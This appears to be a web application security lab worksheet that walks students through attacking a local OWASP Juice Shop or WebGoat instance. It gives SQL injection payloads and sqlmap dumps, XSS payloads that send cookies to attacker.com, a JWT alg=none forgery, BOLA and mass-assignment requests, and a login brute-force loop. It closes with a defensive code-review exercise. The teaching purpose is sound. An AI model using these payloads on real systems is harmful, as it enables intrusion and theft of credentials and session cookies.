Application Security Lab
Checking access...
This lab provides practical experience with application security testing. You will work through exercises targeting real vulnerabilities in a deliberately vulnerable application.
Setup
# Option 1: OWASP Juice Shop (local Docker)docker pull bkimminich/juice-shopdocker run -d -p 3000:3000 bkimminich/juice-shop# Open http://localhost:3000
# Option 2: OWASP WebGoat (local)docker pull webgoat/goatandwolfdocker run -d -p 8080:8080 -p 9090:9090 webgoat/goatandwolf# Open http://localhost:8080/WebGoat
# Install toolssudo apt install -y sqlmap nmap curl jqpip install requests flask flask-wtfnpm install -g jwt-cliExercise 1: Reconnaissance
Objective
Discover the attack surface of the target application.
# 1. Enumerate endpointscurl -s http://localhost:3000/api/ | jq '.'
# 2. Directory brute-forcing with common pathsfor path in admin api assets backup config debug docs graphql health login logout robots swagger test; do status=$(curl -s -o /dev/null -w "%{http_code}" "http://localhost:3000/$path") echo "GET /$path → HTTP $status"done
# 3. Check security headerscurl -s -I http://localhost:3000 | grep -iE "x-frame|x-content|x-xss|strict|csp|hsts"
# 4. Extract JavaScript files for endpoint discoverycurl -s http://localhost:3000 | grep -oP 'src="[^"]+"' | sort -uQuestions
- What endpoints did you discover?
- What security headers are missing?
- What information can you gather from JavaScript files?
Exercise 2: SQL Injection
Objective
Extract data from the database using SQL injection.
# 1. Test login form with SQL injectioncurl -X POST http://localhost:3000/rest/user/login \ -H "Content-Type: application/json" \ -d '{"email": "' OR 1=1 --", "password": "anything"}'
# 2. If that doesn't work, try these payloads# ' OR '1'='1# admin@test.com' --# ' UNION SELECT 1,2,3,4,5,6 --# '; WAITFOR DELAY '00:00:05' --# ' AND SLEEP(5) --
# 3. Use sqlmap for automated exploitationsqlmap -u "http://localhost:3000/rest/products/search?q=test" --batchsqlmap -u "http://localhost:3000/rest/products/search?q=test" --dbssqlmap -u "http://localhost:3000/rest/products/search?q=test" -D juice_shop --tablessqlmap -u "http://localhost:3000/rest/products/search?q=test" -D juice_shop -T Users --dumpDeliverable
- Extracted user credentials (email + password hash)
- Password hash cracking attempt with hashcat
- SQLi payload that worked and why
Exercise 3: Cross-Site Scripting (XSS)
Objective
Inject and execute JavaScript payloads.
# 1. Test search field for reflected XSScurl "http://localhost:3000/?q=<script>alert(1)</script>"
# 2. If blocked, try:# <img src=x onerror=alert(1)># <svg onload=alert(1)># "><script>alert(1)</script># <script>fetch('https://attacker.com/steal?c='+document.cookie)</script>
# 3. Test comment/review form for stored XSScurl -X POST http://localhost:3000/api/Reviews \ -H "Content-Type: application/json" \ -d '{"productId": 1, "message": "<script>alert(document.cookie)</script>"}'
# 4. Craft XSS payload that steals cookiescat > steal_cookie.js << 'JS'<script> fetch('https://attacker.com/collect?cookie=' + document.cookie + '&page=' + encodeURIComponent(document.location.href))</script>JSDeliverable
- One working reflected XSS payload
- One working stored XSS payload
- Explanation of why the payload executed (what encoding was missing)
Exercise 4: JWT Attacks
Objective
Exploit weaknesses in JWT authentication.
# 1. Log in and capture the JWTTOKEN=$(curl -s -X POST http://localhost:3000/rest/user/login \ -H "Content-Type: application/json" \ -d '{"email":"test@test.com","password":"test123"}' | jq -r '.authentication.token')echo "Token: $TOKEN"
# 2. Decode the JWT (Base64 decode)echo $TOKEN | cut -d. -f2 | base64 -d 2>/dev/nullecho $TOKEN | cut -d. -f1 | base64 -d 2>/dev/null # Header
# 3. Check the algorithmecho $TOKEN | jwt decode -
# 4. Try algorithm confusion attack (alg:none)python3 << 'PYEOF'import jwt
# Try "none" algorithmpayload = {"email": "admin@juice-sh.op", "iat": 1516239022}try: token = jwt.encode(payload, key="", algorithm="none") print(f"alg=none token: {token}")except: print("alg=none attack blocked")PYEOFDeliverable
- Decoded JWT showing header, payload, and signature
- If vulnerable, forged admin token
- Analysis of JWT security measures
Exercise 5: API Security Testing
Objective
Find API vulnerabilities including BOLA, mass assignment, and excessive data exposure.
# 1. BOLA test — try to access another user's datacurl -s http://localhost:3000/rest/user/2 # Try different user IDscurl -s http://localhost:3000/api/Orders/1?userId=2
# 2. Mass assignment — try to escalate privilegescurl -X PATCH http://localhost:3000/rest/user/1 \ -H "Content-Type: application/json" \ -H "Authorization: Bearer $TOKEN" \ -d '{"role": "admin"}' # Try adding unexpected fields
# 3. Excessive data exposurecurl -s http://localhost:3000/rest/user/1 | jq '.'
# 4. Rate limit testingfor i in {1..100}; do curl -s -o /dev/null -w "%{http_code}\n" \ -X POST http://localhost:3000/rest/user/login \ -H "Content-Type: application/json" \ -d '{"email":"test@test.com","password":"wrong'$i'"}'done | sort | uniq -cDeliverable
- BOLA vulnerability (accessing another user’s data)
- Mass assignment vulnerability (if found)
- Rate limiting analysis (how many requests before blocking?)
- Excessive data exposure findings
Exercise 6: Secure Code Review
Objective
Identify vulnerabilities in source code.
# Clone Juice Shop sourcegit clone https://github.com/juice-shop/juice-shop.gitcd juice-shop
# Search for common vulnerability patternsecho "=== SQLi patterns (string concatenation) ==="grep -rn "\\$\\{.*query" --include="*.ts" --include="*.js" | head -10
echo ""echo "=== XSS patterns (innerHTML) ==="grep -rn "innerHTML" --include="*.ts" --include="*.js" | head -10
echo ""echo "=== Hardcoded secrets ==="grep -rn "password" --include="*.ts" --include="*.js" -i | grep -v test | grep -v node_modules | head -20
echo ""echo "=== Insecure crypto ==="grep -rn "MD5\|SHA1\|DES\|RC4" --include="*.ts" --include="*.js" | head -10Code Review Checklist
Check each file for: └─ SQL injection: String concatenation in database queries └─ XSS: innerHTML, dangerouslySetInnerHTML, v-html └─ Broken auth: Missing authentication check on endpoints └─ Broken access control: No ownership verification └─ Secrets: Hardcoded API keys, passwords, tokens └─ Insecure crypto: Weak algorithms, static IVs └─ Mass assignment: req.body directly to database └─ Path traversal: User input in file pathsDeliverable
- At least 5 vulnerabilities identified in code review
- For each: file, line number, vulnerability type, fix recommendation
- Pull request with fixes for the most critical issue
Lab Completion Checklist
- Exercise 1: Application recon complete (endpoints, headers, JS analysis)
- Exercise 2: SQL injection working — data extracted and cracked
- Exercise 3: Reflected and stored XSS working
- Exercise 4: JWT decoded, alg:none attack tested
- Exercise 5: API vulnerabilities documented (BOLA, mass assignment, rate limiting)
- Exercise 6: Code review findings with fix recommendations
- All results documented with payloads, commands, and screenshots